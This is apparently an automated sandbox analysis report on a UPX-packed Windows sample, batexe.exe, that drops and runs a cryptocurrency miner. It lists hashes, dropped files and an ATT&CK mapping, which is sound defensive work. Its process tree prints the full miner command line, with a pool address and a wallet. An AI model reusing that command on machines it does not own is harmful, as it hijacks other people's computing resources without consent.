73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
307s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
14/02/2024, 11:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4584	b2e.exe
2388	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2388	cpuminer-sse2.exe
2388	cpuminer-sse2.exe
2388	cpuminer-sse2.exe
2388	cpuminer-sse2.exe
2388	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1404-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4720 wrote to memory of 2388	4720	cmd.exe	78
PID 4720 wrote to memory of 2388	4720	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1404
- C:\Users\Admin\AppData\Local\Temp\1A0B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1A0B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1A0B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2093.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1A0B.tmp\b2e.exe

Filesize
3.2MB

MD5
47e39c0b868a97da7cf626f9a5b1eb76

SHA1
e801b1928655f5b37ece8ec56b8239d8c1c1a450

SHA256
4a84ee1c4c48ae848bf44e4a156a2beff0076a2b02873b2372afe73276dd40db

SHA512
913b51920b00e4e67ec5c223a77a88050bae7316473c862acc065679d9d929a946c1d10a1566f91ca1bd6eab2f9b68e4b5e9769cb5755cdba0ae9ee6cb9c42a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1A0B.tmp\b2e.exe

Filesize
2.1MB

MD5
48ecfe3acc215840ace5478c2ce55f09

SHA1
e2112534b31ebfcdf21862cb471ea0c6f1e48c3a

SHA256
32ca43fb55b2c57946ef80887ddf3f1cd2f4525f7cd9f859dc0dd0dfd4ede8cf

SHA512
2d1925085fa64aca6a607398bbd090f479a762787c84ac17f2c8c086a0c18341d1dfc2c861c2f7e475b25a6f7ac12ef02b075a78810277bcb2675677cf0052e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2093.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
229KB

MD5
c7b0367e7bbda3251165d24445d1d2d8

SHA1
b18cd9f047619ebcb7e8f80292961e6d2db01c6e

SHA256
2e493825d7f9ede302546b6d79223c96f8e9ac5ff624defe471c056a3ffe2b54

SHA512
7dcf2f939bd01afe74a030bb41d19a6b0cedefbbc38aa6edf41308c4cbc059017df3903454d9588d918c05200a8ac5d3467be55d09c1e41a910bfa61adaee24e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
132KB

MD5
9d0d288a5526d0af6426d5800ef4498b

SHA1
2d2b21b09ddccc17503a2498773fc27d1d73485d

SHA256
a2ba1f00d9bcd4b85cbd3ce836e00f1c66d647b6b279f369db341dfd4fd6812f

SHA512
92e297a08ac696e607548019c20253892ce738bdacd1709d4173e2bd763104d6fe9f5322189094c4bdb8c069b223b493cb36953dcfb976f4cc1025e11f7f2a82

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
142KB

MD5
5a8addef525e8a1a615a9b7533ffda90

SHA1
3fbf94eb8af0c427e75c2508e494754f804e6b4e

SHA256
1f86111d411341522bb85bf0c92f9c607e16d699866fe70e1b1276039d3e6925

SHA512
4fdf0ebb65098d560f4ac128208e6413fff6306b463d6cb86724f38137790be9d8e051ec6eec4d0371cb2a3251ba02b190543cc4772321d5cbf9c87b1685ec24

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
94KB

MD5
2eb16b7133cdce1b3290d5ecf72a8b6f

SHA1
54d3dc731b40725e87f6e96dc0bbf9c4e3b3f2c2

SHA256
b7934b97ded257fc77227dfd35c9cf69a60af3111b35c4167fd79e863be00414

SHA512
49fc4f6604622fbac832fec4e4b56466ff5ca35a39f4035960970663cbd9833c430243bec1b321644602d892cbcb0c35dad005e2e9ab1ed06902d149fe290e82

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
148KB

MD5
1814a72c60e358dcd338724e725e85e3

SHA1
5b88f94dc1ab3a6be9cc17fd02bb0fb532423183

SHA256
56f72e746bf0a0d46d2924d947dd5736437b94c0bcb64a35dcc7bb10cc8c1763

SHA512
4815a4e68377a6e10af3eff206e6632d0b0a40e88f6d968cb5532749b2449e6e82b280ee2465386a2dd3ab103b4e1e8bb18f1012b50122f6f7cbcb64460d742d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
184KB

MD5
5ebdd92d5c41d80fa9e5c8b93c66650f

SHA1
c949240571235ba53a0b61c78bd1b0d90c368530

SHA256
9dbe5bc536e5ff8a87c4741d4e3827f99d58ed91f195655087eabef126ddb1ad

SHA512
08e139ded32a0705bc674fba16696091677ca39222924f1f2cf6527d6d06d628f8c04db18a26b86eaaed4f74cbc687c4bd77fc757ee18a126dc47c9dfc148a83

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
78KB

MD5
a73b70e4f24237d4d4bba2755fb91626

SHA1
e1390ef555e5ea30bcdd40893ecfec416de2d2e8

SHA256
b9a2b74d93f28184416a97c51d226985abeeb3a4218cbd054d3bc810c5e573e6

SHA512
1dbf5c9b007375b372c39d162459ecbfa51d2a3926aff3b8e6a6306ef756fe5c9b536c601428ce0a43e5290aacfe22541294cf28d0e804db7947c691145b502f

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
149KB

MD5
4365aab46385493765037e58bf910e9e

SHA1
d7a84ccfa430cf83defcd2e7c330e6cf5c24c0c6

SHA256
20dfd19c8a4951e86ea6f71c94fae93bade07b2b430efa768aa066e5cd841430

SHA512
e729e2b6e961087f5db1cc58fd5c4837ea22ae6f2144672333dcb02936d91d2a10072fbb290d811f5e2e4eaf898f22e3d945f5780b062363fe9f26768beb1c0d

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
112KB

MD5
1e770298f67e08e372d1d586875cd956

SHA1
62364be3652d78816b11ac1378b616e4821beb34

SHA256
215d7473f2011bd8115448dbc069d729a1d767b7445c450b44a1d9b3bda25fd9

SHA512
3d83ca96bc9a08cf575c0e7d4ebb68d1ce68cdfa2fabd7db71b80bf92e2fc026f28c10090309cd458999aee09a432b48aec92f7de781795683cb58ed0e4481f7

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
103KB

MD5
55d6bc7ff13a449b6e38d80a13e10cdf

SHA1
050e7a617ab868e290eb2ff9097bd2dea0222d39

SHA256
f625048fcdfe9142ee6b1c55153d27d5f3a5a323ed3f2e071a2afd3762b9eec7

SHA512
a97399ceabc0cb85d43748a00c95586e747b5f6bd86e3991da54617e395e2e0ef5e4216d8b4f449e6e1b87ab755be5d4f3d0fd75841d558b118a0c1d6223efae

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
114KB

MD5
d283a69f80cb18047420a8e166a6f657

SHA1
b99a45fa80f8b1f5b187f425a5fb8a18550a9810

SHA256
26f34802d87aedf24aebb745bba88fafe070fb49a0e8b149086f1e5e86392864

SHA512
707bf164b7422dd2f5861e8beff202d2cc5f161d752ef34297079f4f9bde3c9ecb6b1b1a5502a7a3f2b3975a8bc815b0a8315d7fbb54c5363e0d28cf156f6ba5

Download Submit
memory/1404-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2388-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2388-43-0x0000000061B90000-0x0000000061C28000-memory.dmp

Filesize
608KB

Download
memory/2388-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2388-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2388-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4584-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download